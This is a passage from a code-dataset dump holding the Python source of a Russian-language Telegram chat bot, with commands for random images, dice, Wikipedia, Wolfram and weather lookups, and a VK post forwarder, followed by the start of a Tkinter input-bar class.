Wi-Fi list\")\n elif command.startswith('/chats'):\n file_name = data.file_location_chats\n user_action_log(message, \"requested chats list\")\n elif command.startswith('/rules'):\n file_name = data.file_location_rules\n user_action_log(message, \"requested rules list\")\n else:\n return\n with open(file_name, 'r') as file:\n my_bot.reply_to(message, file.read(), parse_mode=\"HTML\", disable_web_page_preview=True)\n file.close()\n\n\n# команды /task и /maths\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in (\n '/task', '/task@algebrach_bot', '/maths', '/maths@algebrach_bot'))\n# идёт в соответствующую папку и посылает рандомную картинку\ndef myRandImg(message):\n for command in str(message.text).lower().split():\n if command.startswith('/task'):\n path = data.dir_location_task\n user_action_log(message, \"asked for a challenge\")\n if not len(message.text.split()) == 1:\n your_difficulty = ' '.join(message.text.split(' ')[1:])\n if your_difficulty in data.difficulty:\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n while not rand_img.startswith(your_difficulty):\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message,\n \"chose a difficulty level '{0}' and got that image:\\n{1}\".format(your_difficulty,\n your_img.name))\n your_img.close()\n else:\n my_bot.reply_to(message,\n \"Доступно только три уровня сложности:\\n{0}\\nВыбираю рандомную задачу:\".format(\n data.difficulty))\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message,\n \"chose a non-existent difficuly level '{0}' and got that image:\\n{1}\".format(\n your_difficulty, your_img.name))\n your_img.close()\n else:\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message, \"got that image:\\n{0}\".format(your_img.name))\n your_img.close()\n elif command.startswith('/maths'):\n path = data.dir_location_maths\n user_action_log(message, \"asked for maths.\")\n if not len(message.text.split()) == 1:\n your_subject = ' '.join(message.text.split(' ')[1:]).lower()\n if your_subject in data.subjects:\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n while not rand_img.startswith(your_subject):\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message,\n \"chose subject '{0}' and got that image:\\n{1}\".format(your_subject, your_img.name))\n your_img.close()\n else:\n my_bot.reply_to(message,\n \"На данный момент доступны факты только по следующим предметам:\\n{0}\\nВыбираю рандомный факт:\".format(\n data.subjects))\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message,\n \"chose a non-existent subject '{0}' and got that image:\\n{1}\".format(your_subject,\n your_img.name))\n your_img.close()\n else:\n all_imgs = os.listdir(path)\n rand_img = random.choice(all_imgs)\n your_img = open(path + rand_img, \"rb\")\n my_bot.send_photo(message.chat.id, your_img, reply_to_message_id=message.message_id)\n user_action_log(message, \"got that image:\\n{0}\".format(your_img.name))\n your_img.close()\n\n\n# команда /d6\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ('/d6', '/d6@algebrach_bot'))\n# рандомно выбирает элементы из списка значков\n# TODO: желательно найти способ их увеличить или заменить на ASCII арт\ndef myD6(message):\n d6 = data.d6_symbols\n dice = 2\n roll_sum = 0\n symbols = ''\n for command in str(message.text).lower().split():\n if not len(message.text.split()) == 1:\n dice = ' '.join(message.text.split(' ')[1:])\n try:\n dice = int(dice)\n except ValueError:\n my_bot.reply_to(message,\n \"Не понял число костей. Пожалуйста, введи команду в виде \\'/d6 \\', где — целое от 1 до 10.\")\n return\n if 0 < dice <= 10:\n max_result = dice * 6\n for count in range(dice):\n roll_index = random.randint(0, len(d6) - 1)\n roll_sum += roll_index + 1\n if count < dice - 1:\n symbols += '{0} + '.format(d6[roll_index])\n elif count == dice - 1:\n symbols += '{0} = {1} ({2})'.format(d6[roll_index], roll_sum, max_result)\n my_bot.reply_to(message, symbols)\n user_action_log(message, \"got that D6 output: {0}\".format(symbols))\n\n\n# команда /roll\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ('/roll', '/roll@algebrach_bot'))\n# генерует случайное целое число, в засимости от него может кинуть картинку или гифку\ndef myRoll(message):\n rolled_number = random.randint(0, 100)\n my_bot.reply_to(message, str(rolled_number).zfill(2))\n user_action_log(message, \"recieved {0}.\\n\".format(rolled_number))\n\n\n# команда /truth\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ['/truth', '/truth@algebrach_bot'])\ndef myTruth(message):\n # открывает файл и отвечает пользователю рандомными строками из него\n the_TRUTH = random.randint(1, 1000)\n if not the_TRUTH == 666:\n file_TRUTH = open(data.file_location_truth, 'r')\n TRUTH = random.choice(file_TRUTH.readlines())\n my_bot.reply_to(message, str(TRUTH).replace(\"
\", \"\\n\"))\n file_TRUTH.close()\n user_action_log(message, \"has discovered the Truth:\\n{0}\".format(str(TRUTH).replace(\"
\", \"\\n\")))\n else:\n my_bot.reply_to(message, data.the_TRUTH, parse_mode=\"HTML\")\n user_action_log(message, \"has discovered the Ultimate Truth.\")\n\n\n# команда /gender\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ['/gender', '/gender@algebrach_bot'])\ndef myGender(message):\n # открывает файл и отвечает пользователю рандомными строками из него\n file_gender = open(data.file_location_gender, 'r')\n gender = random.choice(file_gender.readlines())\n my_bot.reply_to(message, str(gender).replace(\"
\", \"\\n\"))\n file_gender.close()\n user_action_log(message, \"has discovered his gender:\\n{0}\".format(str(gender).replace(\"
\", \"\\n\")))\n\n\n# команда /wolfram (/wf)\n@my_bot.message_handler(\n func=lambda message: message.text.lower().split()[0] in ['/wolfram', '/wolfram@algebrach_bot', '/wf'])\ndef wolframSolver(message):\n # обрабатывает запрос и посылает пользователю картинку с результатом в случае удачи\n wolfram_query = []\n # сканируем и передаём всё, что ввёл пользователь после '/wolfram ' или '/wf '\n # TODO: inline\n if not len(message.text.split()) == 1:\n your_query = ' '.join(message.text.split(' ')[1:])\n user_action_log(message, \"entered this query for /wolfram:\\n{0}\".format(your_query))\n response = requests.get(\"https://api.wolframalpha.com/v1/simple?appid=\" + tokens.wolfram,\n params={'i': your_query})\n # если всё хорошо, и запрос найден\n if response.status_code == 200:\n img_wolfram = io.BytesIO(response.content)\n my_bot.send_photo(message.chat.id, img_wolfram, reply_to_message_id=message.message_id)\n user_action_log(message, \"has received this Wolfram output:\\n{0}\".format(response.url))\n # если всё плохо\n else:\n my_bot.reply_to(message,\n \"Запрос не найдён.\\nЕсли ты ввёл его на русском, то попробуй ввести его на английском.\")\n user_action_log(message, \"didn't received any data\")\n # если пользователь вызвал /wolfram без аргумента\n else:\n my_bot.reply_to(message,\n \"Я не понял запрос.\\nДля вызова Wolfram вводи команду в виде \\'/wolfram <запрос>\\' или \\'/wf <запрос>\\'.\")\n user_action_log(message, \"called /wolfram without any arguments\")\n\n\n# команда /weather\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ['/weather', '/weather@algebrach_bot'])\n# получает погоду в Москве на сегодня и на три ближайших дня, пересылает пользователю\ndef myWeather(message):\n global weather_bold\n my_OWM = pyowm.OWM(tokens.owm)\n # где мы хотим узнать погоду\n my_obs = my_OWM.weather_at_place('Moscow')\n w = my_obs.get_weather()\n # статус погоды сейчас\n status = w.get_detailed_status()\n # температура сейчас\n temp_now = w.get_temperature('celsius')\n # limit=4, т.к. первый результат — текущая погода\n my_forecast = my_OWM.daily_forecast('Moscow,RU', limit=4)\n my_fc = my_forecast.get_forecast()\n # температуры на следующие три дня\n my_fc_temps = []\n # статусы на следующие три дня\n my_fc_statuses = []\n for wth in my_fc:\n my_fc_temps.append(str(wth.get_temperature('celsius')['day']))\n my_fc_statuses.append(str(wth.get_status()))\n # если вызвать /weather из кека\n if weather_bold:\n my_bot.send_message(message.chat.id, data.weather_HAARP, parse_mode=\"HTML\")\n weather_bold = False\n user_action_log(message, \"got HAARP'd\")\n # если всё нормально, то выводим результаты\n else:\n my_bot.reply_to(message,\n \"The current temperature in Moscow is {2} C, and it is {3}.\\n\\nTomorrow it will be {4} C, {5}.\\nIn 2 days it will be {6}, {7}.\\nIn 3 days it will be {8} C, {9}.\\n\\n\".format(\n time.strftime(data.time, time.gmtime()), message.from_user.id, temp_now['temp'], status,\n my_fc_temps[1], my_fc_statuses[1], my_fc_temps[2], my_fc_statuses[2], my_fc_temps[3],\n my_fc_statuses[3]))\n user_action_log(message,\n \"got that weather forecast:\\nThe current temperature in Moscow is {0} C, and it is {1}.\\nTomorrow it will be {2} C, {3}.\\nIn 2 days it will be {4}, {5}.\\nIn 3 days it will be {6} C, {7}\".format(\n temp_now['temp'], status, my_fc_temps[1], my_fc_statuses[1], my_fc_temps[2],\n my_fc_statuses[2], my_fc_temps[3], my_fc_statuses[3]))\n\n\n# команда /wiki\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ['/wiki', '/wiki@algebrach_bot'])\n# обрабатывает запрос и пересылает результат, или выдаёт рандомный факт в случае отсутствия запроса\ndef myWiki(message):\n wiki_query = []\n # обрабатываем всё, что пользователь ввёл после '/wiki '\n if not len(message.text.split()) == 1:\n your_query = ' '.join(message.text.split(' ')[1:])\n user_action_log(message, \"entered this query for /wiki:\\n{0}\".format(your_query))\n try:\n # по умолчанию ставим поиск в английской версии\n wikipedia.set_lang(\"en\")\n # если в запросе имеется хоть один символ не с латинским ASCII, ищем в русской версии\n for s in your_query:\n if ord(s) > 127:\n wikipedia.set_lang(\"ru\")\n break\n # извлекаем первые 7 предложений найденной статьи\n wiki_response = wikipedia.summary(your_query, sentences=7)\n # извлекаем ссылку на саму статью\n wiki_url = wikipedia.page(your_query).url\n # извлекаем название статьи\n wiki_title = wikipedia.page(your_query).title\n my_bot.reply_to(message, \"{0}.\\n{1}\\n\\n{2}\".format(wiki_title, wiki_response, wiki_url),\n parse_mode=\"HTML\")\n # всё плохо, ничего не нашли\n except wikipedia.exceptions.PageError:\n my_bot.reply_to(message, \"Запрос не найден.\")\n # нашли несколько статей, предлагаем пользователю список\n except wikipedia.exceptions.DisambiguationError as ex:\n wiki_options = ex.options\n my_bot.reply_to(message,\n \"Пожалуйста, уточни запрос. Выбери, что из перечисленного имелось в виду, и вызови /wiki ещё раз.\\n\" + \"\\n\".join(\n map(str, wiki_options)))\n # берём рандомную статью на рандомном языке (перечисляем языки в data.py)\n else:\n wikipedia.set_lang(random.choice(data.wiki_langs))\n try:\n wikp = wikipedia.random(pages=1)\n wikpd = wikipedia.page(wikp)\n wikiFact = wikipedia.summary(wikp, sentences=3)\n my_bot.reply_to(message, \"{0}.\\n{1}\".format(wikpd.title, wikiFact), parse_mode=\"HTML\")\n except wikipedia.exceptions.DisambiguationError:\n wikp = wikipedia.random(pages=1)\n wikiVar = wikipedia.search(wikp, results=1)\n print(\"There are multiple possible pages for that article.\\n\")\n wikpd = wikipedia.page(str(wikiVar[0]))\n wikiFact = wikipedia.summary(wikiVar, sentences=4)\n my_bot.reply_to(message, \"{0}.\\n{1}\".format(wikp, wikiFact), parse_mode=\"HTML\")\n user_action_log(message, \"got Wikipedia article\\n{0}\".format(str(wikp)))\n\n\n# команда /meme (выпиливаем?)\n@my_bot.message_handler(commands=['meme'])\n# открывает соответствующую папку и кидает из не рандомную картинку или гифку\ndef myMemes(message):\n all_imgs = os.listdir(data.dir_location_meme)\n rand_file = random.choice(all_imgs)\n your_file = open(data.dir_location_meme + rand_file, \"rb\")\n if rand_file.endswith(\".gif\"):\n my_bot.send_document(message.chat.id, your_file, reply_to_message_id=message.message_id)\n else:\n my_bot.send_photo(message.chat.id, your_file, reply_to_message_id=message.message_id)\n user_action_log(message, \"got that meme:\\n{0}\".format(your_file.name))\n your_file.close()\n\n\n# команда /kek\n@my_bot.message_handler(func=lambda message: message.text.lower().split()[0] in ['/kek', '/kek@algebrach_bot'])\n# открывает соответствующие файл и папку, кидает рандомную строчку из файла, или рандомную картинку или гифку из папки\ndef myKek(message):\n global weather_bold\n global kek_counter\n global kek_bang\n global kek_crunch\n kek_init = True\n\n if message.chat.id == int(data.my_chatID):\n if kek_counter == 0:\n kek_bang = time.time()\n kek_crunch = kek_bang + 60 * 60\n kek_counter += 1\n kek_init = True\n elif (kek_counter >= data.limit_kek) and (time.time() <= kek_crunch):\n kek_init = False\n elif time.time() > kek_crunch:\n kek_counter = -1\n kek_init = True\n print(\"KEK BANG : {0}\\nKEK CRUNCH : {1}\\nKEK COUNT : {2}\\nTIME NOW : {3}\".format(kek_bang, kek_crunch,\n kek_counter, time.time()))\n\n if kek_init:\n if message.chat.id < 0:\n kek_counter += 1\n your_destiny = random.randint(1, 60)\n # если при вызове не повезло, то кикаем из чата\n if your_destiny == 13:\n my_bot.reply_to(message, \"Предупреждал же, что кикну. Если не предупреждал, то \")\n your_img = open(data.dir_location_meme + \"memeSurprise.gif\", \"rb\")\n my_bot.send_document(message.chat.id, your_img, reply_to_message_id=message.message_id)\n your_img.close()\n try:\n if int(message.from_user.id) in data.admin_ids:\n my_bot.reply_to(message, \"...Но против хозяев не восстану.\")\n user_action_log(message, \"can't be kicked out\")\n else:\n # кикаем кекуна из чата (можно ещё добавить условие, что если один юзер прокекал больше числа n за время t, то тоже в бан)\n my_bot.kick_chat_member(message.chat.id, message.from_user.id)\n user_action_log(message, \"has been kicked out\")\n my_bot.unban_chat_member(message.chat.id, message.from_user.id)\n # тут же снимаем бан, чтобы смог по ссылке к нам вернуться\n user_action_log(message, \"has been unbanned\")\n except Exception as ex:\n logging.exception(ex)\n pass\n else:\n type_of_KEK = random.randint(1, 33)\n # 1/33 шанс на картинку или гифку\n if type_of_KEK == 9:\n all_imgs = os.listdir(data.dir_location_kek)\n rand_file = random.choice(all_imgs)\n your_file = open(data.dir_location_kek + rand_file, \"rb\")\n if rand_file.endswith(\".gif\"):\n my_bot.send_document(message.chat.id, your_file, reply_to_message_id=message.message_id)\n else:\n my_bot.send_photo(message.chat.id, your_file, reply_to_message_id=message.message_id)\n your_file.close()\n user_action_log(message, \"got that kek:\\n{0}\".format(your_file.name))\n # иначе смотрим файл\n else:\n file_KEK = open(data.file_location_kek, 'r')\n your_KEK = random.choice(file_KEK.readlines())\n if str(your_KEK) == str(\"Чекни /weather.\\n\"):\n weather_bold = True\n else:\n weather_bold = False\n # если попалась строчка вида 'ID', то шлём стикер по ID\n if str(your_KEK).startswith(\"\"):\n if not str(your_KEK).endswith(\"\\n\"):\n sticker_id = str(your_KEK[9:])\n else:\n sticker_id = str(your_KEK[9:-1])\n my_bot.send_sticker(message.chat.id, sticker_id, reply_to_message_id=message.message_id)\n # иначе просто шлём обычный т��кст\n else:\n my_bot.reply_to(message, str(your_KEK).replace(\"
\", \"\\n\"))\n file_KEK.close()\n user_action_log(message, \"got that kek:\\n{0}\".format(str(your_KEK).replace(\"
\", \"\\n\")))\n if kek_counter == data.limit_kek - 10:\n time_remaining = divmod(int(kek_crunch) - int(time.time()), 60)\n my_bot.reply_to(message,\n \"Внимание!\\nЭтот чат может покекать ещё не более {0} раз до истечения кекочаса (через {1} мин. {2} сек.).\\nПо истечению кекочаса счётчик благополучно сбросится.\".format(\n data.limit_kek - kek_counter, time_remaining[0], time_remaining[1]), parse_mode=\"HTML\")\n if kek_counter == data.limit_kek:\n time_remaining = divmod(int(kek_crunch) - int(time.time()), 60)\n my_bot.reply_to(message, \"EL-FIN!\\nТеперь вы сможете кекать только через {0} мин. {1} сек.\".format(\n time_remaining[0], time_remaining[1]), parse_mode=\"HTML\")\n kek_counter += 1\n else:\n print(\"{0}\\nLimit of keks has been expired.\\nWait until {1} to kek again.\\n\".format(\n time.strftime(data.time, time.gmtime()), kek_crunch))\n\n\n# для читерства\n\n@my_bot.message_handler(commands=['prize'])\ndef showPrizes(message):\n if not len(message.text.split()) == 1 and int(message.from_user.id in data.admin_ids):\n codeword = message.text.split()[1]\n if codeword == data.my_prize:\n all_imgs = os.listdir(data.dir_location_prize)\n rand_file = random.choice(all_imgs)\n your_file = open(data.dir_location_prize + rand_file, \"rb\")\n if rand_file.endswith(\".gif\"):\n my_bot.send_document(message.chat.id, your_file, reply_to_message_id=message.message_id)\n else:\n my_bot.send_photo(message.chat.id, your_file, reply_to_message_id=message.message_id)\n user_action_log(message, \"knows the secret and got that prize:\\n{0}\\n\".format(your_file.name))\n your_file.close()\n elif not int(message.from_user.id in data.admin_ids):\n user_action_log(message, \"tried to access the prizes, but he's not in Admin list\")\n\n\n@my_bot.message_handler(commands=['dn'])\n# рандомно выбирает элементы из списка значков\n# TODO: желательно найти способ их увеличить или заменить на ASCII арт\ndef myDN(message):\n roll_sum = 0\n symbols = ''\n if len(message.text.split()) == 3:\n try:\n dice_max = int(message.text.split()[1])\n dice_n = int(message.text.split()[2])\n except ValueError:\n return\n max_result = dice_n * dice_max\n for count in range(dice_n):\n roll = random.randint(0, dice_max)\n roll_sum += roll\n if count < dice_n - 1:\n symbols += '{0} + '.format(roll)\n elif count == dice_n - 1:\n symbols += '{0} = {1} ({2})'.format(roll, roll_sum, max_result)\n if not len(symbols) > 4096:\n my_bot.reply_to(message, symbols)\n user_action_log(message, \"knew about /dn and got that output: {0}\".format(symbols))\n else:\n my_bot.reply_to(message, \"Слишком большие числа. Попробуй что-нибудь поменьше\")\n user_action_log(message, \"knew about /dn and the answer was too long to fit one message\")\n\n\n@my_bot.message_handler(commands=['kill'])\ndef killBot(message):\n if not len(message.text.split()) == 1 and int(message.from_user.id in data.admin_ids):\n codeword = message.text.split()[1]\n if codeword == data.my_killswitch:\n my_bot.reply_to(message, \"Прощай, жестокий чат. ;~;\")\n # создаём отдельный алёрт для .sh скрипта — перезапустим бот сами\n try:\n file_killed_write = open(data.bot_killed_filename, 'w')\n file_killed_write.close()\n print(\n \"{0}\\nBot has been killed off remotely by user {1}.\\nPlease, change the killswitch keyword in data.py before running the bot again.\".format(\n time.strftime(data.time, time.gmtime()), message.from_user.first_name))\n sys.exit()\n except RuntimeError:\n sys.exit()\n elif not int(message.from_user.id in data.admin_ids):\n user_action_log(message, \"tried to kill the bot. Fortunately, he's not in Admin list\")\n\n\n# проверяет наличие новых постов ВК в паблике Мехмата и кидает их при наличии\ndef vkListener(interval):\n while tokens.vk != \"\":\n try:\n # коннектимся к API через requests. Берём первые два поста\n response = requests.get('https://api.vk.com/method/wall.get',\n params={'access_token': tokens.vk, 'owner_id': data.vkgroup_id, 'count': 2,\n 'offset': 0})\n # создаём json-объект для работы\n posts = response.json()['response']\n # инициализируем строку, чтобы он весь текст кидал одним сообщением\n vk_final_post = ''\n vk_initiate = False\n show_preview = False\n # пытаемся открыть файл с датой последнего поста\n try:\n file_lastdate_read = open(data.vk_update_filename, 'r')\n last_recorded_postdate = file_lastdate_read.read()\n file_lastdate_read.close()\n except IOError:\n last_recorded_postdate = -1\n pass\n try:\n int(last_recorded_postdate)\n except ValueError:\n last_recorded_postdate = -1\n pass\n # смотрим, запиннен ли первый пост\n if 'is_pinned' in posts[-2]:\n is_post_pinned = posts[-2]['is_pinned']\n else:\n is_post_pinned = 0\n # если да, то смотрим, что свежее — запинненный пост или следующий за ним\n if is_post_pinned == 1:\n date_pinned = int(posts[-2]['date'])\n date_notpinned = int(posts[-1]['date'])\n if date_pinned >= date_notpinned:\n post = posts[-2]\n else:\n post = posts[-1]\n post_date = max(date_pinned, date_notpinned)\n # если нет, то берём первый пост\n else:\n post = posts[-2]\n post_date = int(posts[-2]['date'])\n # наконец, сверяем дату свежего поста с датой, сохранённой в файле\n if post_date > int(last_recorded_postdate):\n vk_initiate = True\n else:\n vk_initiate = False\n # если в итоге полученный пост — новый, то начинаем операцию\n if vk_initiate:\n post_recent_date = post_date\n print(\n \"{0}\\nWe have new post in Mechmath's VK public.\\n\".format(time.strftime(data.time, time.gmtime())))\n # если это репост, то сначала берём сообщение самого мехматовского поста\n if ('copy_text' in post) or ('copy_owner_id' in post):\n if 'copy_text' in post:\n post_text = post['copy_text']\n vk_final_post += post_text.replace(\"
\", \"\\n\")\n # пробуем сформулировать откуда репост\n if 'copy_owner_id' in post:\n original_poster_id = post['copy_owner_id']\n # если значение ключа 'copy_owner_id' отрицательное, то перед нами репост из группы\n if int(original_poster_id) < 0:\n response_OP = requests.get('https://api.vk.com/method/groups.getById',\n params={'group_ids': -(int(original_poster_id))})\n name_OP = response_OP.json()['response'][0]['name']\n screenname_OP = response_OP.json()['response'][0]['screen_name']\n # добавляем строку, что это репост из такой-то группы\n vk_final_post += \"\\n\\nРепост из группы {1}:\\n\".format(\n screenname_OP, name_OP)\n # если значение ключа 'copy_owner_id' положительное, то репост пользователя\n else:\n response_OP = requests.get('https://api.vk.com/method/users.get',\n params={'access_token': tokens.vk,\n 'user_id': int(original_poster_id)})\n name_OP = \"{0} {1}\".format(response_OP.json()['response'][0]['first_name'],\n response_OP.json()['response'][0]['last_name'], )\n screenname_OP = response_OP.json()['response'][0]['uid']\n # добавляем строку, что это репост такого-то пользователя\n vk_final_post += \"\\n\\nРепост от пользователя {1}:\\n\".format(\n screenname_OP, name_OP)\n else:\n print(\"What.\")\n try:\n # добавляем сам текст репоста\n post_text = post['text']\n vk_final_post += post_text.replace(\"
\", \"\\n\")\n vk_final_post += \"\\n\"\n except KeyError:\n pass\n # смотрим на наличие ссылок, если есть — добавляем\n try:\n for i in range(0, len(post['attachments'])):\n if 'link' in post['attachments'][i]:\n post_link = post['attachments'][i]['link']['url']\n vk_final_post += post_link\n vk_final_post += \"\\n\"\n print(\"Successfully extracted link URL:\\n{0}\\n\".format(post_link))\n except KeyError:\n pass\n # если есть вики-ссылки на профили пользователей ВК вида '[screenname|real name]', то превращаем ссылки в кликабельные\n try:\n pattern = re.compile(r\"\\[([^\\|]+)\\|([^\\|]+)\\]\", re.U)\n results = pattern.findall(vk_final_post.decode('utf-8'), re.U)\n for i in range(0, len(results)):\n screen_name_user = results[i][0].encode('utf-8')\n real_name_user = results[i][1].encode('utf-8')\n link = \"{1}\".format(screen_name_user, real_name_user)\n unedited = \"[{0}|{1}]\".format(screen_name_user, real_name_user)\n vk_final_post = vk_final_post.replace(unedited, link)\n except Exception as ex:\n logging.exception(ex)\n # смотрим на наличие картинок\n try:\n img_src = []\n for i in range(0, len(post['attachments'])):\n # если есть, то смотрим на доступные размеры. Для каждой картинки пытаемся выудить ссылку на самое большое расширение, какое доступно\n if 'photo' in post['attachments'][i]:\n we_got_src = False\n if 'src_xxbig' in post['attachments'][i]['photo']:\n post_attach_src = post['attachments'][i]['photo']['src_xxbig']\n we_got_src = True\n request_img = requests.get(post_attach_src)\n img_vkpost = io.BytesIO(request_img.content)\n img_src.append(img_vkpost)\n print(\"Successfully extracted photo URL:\\n{0}\\n\".format(post_attach_src))\n elif ('src_xbig' in post['attachments'][i]['photo']) and (not we_got_src):\n post_attach_src = post['attachments'][i]['photo']['src_big']\n we_got_src = True\n request_img = requests.get(post_attach_src)\n img_vkpost = io.BytesIO(request_img.content)\n img_src.append(img_vkpost)\n print(\"Successfully extracted photo URL:\\n{0}\\n\".format(post_attach_src))\n elif ('src_big' in post['attachments'][i]['photo']) and (not we_got_src):\n post_attach_src = post['attachments'][i]['photo']['src_big']\n we_got_src = True\n request_img = requests.get(post_attach_src)\n img_vkpost = io.BytesIO(request_img.content)\n img_src.append(img_vkpost)\n print(\"Successfully extracted photo URL:\\n{0}\\n\".format(post_attach_src))\n elif not we_got_src:\n post_attach_src = post['attachments'][i]['photo']['src']\n we_got_src = True\n request_img = requests.get(post_attach_src)\n img_vkpost = io.BytesIO(request_img.content)\n img_src.append(img_vkpost)\n print(\"Successfully extracted photo URL:\\n{0}\\n\".format(post_attach_src))\n else:\n print(\"Couldn't extract photo URL from a VK post.\\n\")\n except KeyError:\n pass\n # отправляем нашу строчку текста\n # если в тексте есть ссылка, а по ссылке есть какая-нибудь картинка,\n # то прикрепляем ссылку к сообщению (делаем превью)\n try:\n if 'image_src' in post['attachment']['link']:\n show_preview = True\n except KeyError:\n show_preview = False\n pass\n if show_preview:\n my_bot.send_message(data.my_chatID, vk_final_post.replace(\"
\", \"\\n\"), parse_mode=\"HTML\")\n # если нет — отправляем без прикреплённой ссылки\n else:\n my_bot.send_message(data.my_chatID, vk_final_post.replace(\"
\", \"\\n\"), parse_mode=\"HTML\",\n disable_web_page_preview=True)\n # отправляем все картинки, какие нашли\n for i in range(0, len(img_src)):\n my_bot.send_photo(data.my_chatID, img_src[i])\n # записываем дату поста в файл, чтобы потом сравнивать новые посты\n file_lastdate_write = open(data.vk_update_filename, 'w')\n file_lastdate_write.write(str(post_recent_date))\n file_lastdate_write.close()\n vk_initiate = False\n # 5 секунд нужно для инициализации файла\n time.sleep(5)\n time.sleep(interval)\n # из-за Telegram API иногда какой-нибудь пакет не доходит\n except ReadTimeout as ex:\n # logging.exception(e)\n print(\n \"{0}\\nRead Timeout in vkListener() function. Because of Telegram API.\\nWe are offline. Reconnecting in 5 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(5)\n # если пропало соединение, то пытаемся снова через минуту\n except ConnectionError as ex:\n # logging.exception(e)\n print(\n \"{0}\\nConnection Error in vkListener() function.\\nWe are offline. Reconnecting in 60 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(60)\n # если Python сдурит и пойдёт в бесконечную рекурсию (не особо спасает)\n except RuntimeError as ex:\n # logging.exception(e)\n print(\"{0}\\nRuntime Error in vkListener() function.\\nRetrying in 3 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(3)\n # если что-то неизвестное — от греха вырубаем с корнем. Создаём алёрт файл для .sh скрипта\n except Exception as ex:\n print(\"{0}\\nUnknown Exception in vkListener() function:\\n{1}\\n{2}\\n\\nCreating the alert file.\\n\".format(\n time.strftime(data.time, time.gmtime()), ex.message, ex.args))\n alert_file_down_write = open(data.bot_down_filename, 'w')\n alert_file_down_write.close()\n print(\"{0}\\nShutting down.\".format(time.strftime(data.time, time.gmtime())))\n os._exit(-1)\n\n\nwhile __name__ == '__main__':\n try:\n # если бот запущен .sh скриптом после падения — удаляем алёрт-файл\n try:\n os.remove(data.bot_down_filename)\n except OSError:\n pass\n # если бот запущен после вырубания нами — удаляем алёрт-файл\n try:\n os.remove(data.bot_killed_filename)\n except OSError:\n pass\n interval = data.vk_interval\n # задаём новый поток для отслеживания постов в ВК, чтобы можно было одновременно работать с ботом\n t = threading.Thread(target=vkListener, args=(interval,))\n t.daemon = True\n t.start()\n bot_update = my_bot.get_updates()\n my_bot.polling(none_stop=True, interval=1)\n time.sleep(1)\n # из-за Telegram API иногда какой-нибудь пакет не доходит\n except ReadTimeout as e:\n # logging.exception(e)\n print(\"{0}\\nRead Timeout. Because of Telegram API.\\nWe are offline. Reconnecting in 5 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(5)\n # если пропало соединение, то пытаемся снова через минуту\n except ConnectionError as e:\n # logging.exception(e)\n print(\"{0}\\nConnection Error.\\nWe are offline. Reconnecting in 60 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(60)\n # если Python сдурит и пойдёт в бесконечную рекурсию (не особо спасает)\n except RuntimeError as e:\n # logging.exception(e)\n print(\"{0}\\nRuntime Error.\\nRetrying in 3 seconds.\\n\".format(time.strftime(data.time, time.gmtime())))\n time.sleep(3)\n # кто-то обратился к боту на кириллице\n except UnicodeEncodeError as e:\n # logging.exception(e)\n print(\"{0}\\nUnicode Encode Error. Someone typed in cyrillic.\\nRetrying in 3 seconds.\\n\".format(\n time.strftime(data.time, time.gmtime())))\n time.sleep(3)\n # завершение работы из консоли стандартным Ctrl-C\n except KeyboardInterrupt as e:\n # logging.exception(e)\n print(\"\\n{0}\\nKeyboard Interrupt. Good bye.\\n\".format(time.strftime(data.time, time.gmtime())))\n sys.exit()\n # если что-то неизвестное — от греха вырубаем с корнем. Создаём алёрт файл для .sh скрипта\n except Exception as e:\n print(\"{0}\\nUnknown Exception:\\n{1}\\n{2}\\n\\nCreating the alert file.\\n\".format(\n time.strftime(data.time, time.gmtime()), e.message, e.args))\n file_down_write = open(data.bot_down_filename, 'w')\n file_down_write.close()\n print(\"{0}\\nShutting down.\".format(time.strftime(data.time, time.gmtime())))\n os._exit(-1)\n","sub_path":"mm-randbot.py","file_name":"mm-randbot.py","file_ext":"py","file_size_in_byte":46449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"209299129","text":"try:\n from Tkinter import *\nexcept:\n from tkinter import *\n\ndef denHex(x):\n # Converts a denary integer into a formatted hexadecimal string\n l = hex(x)[2:].upper()\n if len(l) == 1:\n l = \"0\" + l\n return l\nclass InBar:\n def __init__(self, master, r, c):\n self.master = master\n self.frame = Frame(master,borderwidth=5,relief=\"groove\", bg = \"white\")\n self.frame.grid(row=r, column=c, sticky = W)\n self.fontSize = 12\n self.font = (\"Consolas\",self.fontSize)\n self.label = Label(self.frame,text=\"Input: \",font=self.font,width=8, bg = \"white\")\n self.label.grid(row=0, column=0)\n self.strVar = StringVar()\n self.entry = Entry(self.frame,textvariable=self.strVar,width=10,justify=LEFT, font = self.font,state = \"disabled\", bg =\"white\")\n self.entry.grid(row=0, column=1)\n self.running = False\n #self.enterButton = Button(self.frame,text=\"Enter\",font=self.font,width=7,command=self.enterInput)\n #self.enterButton.grid(row=0,column=2)\n\n def setInState(self, state):\n self.running = state\n pass\n\n\n def trigger(self, 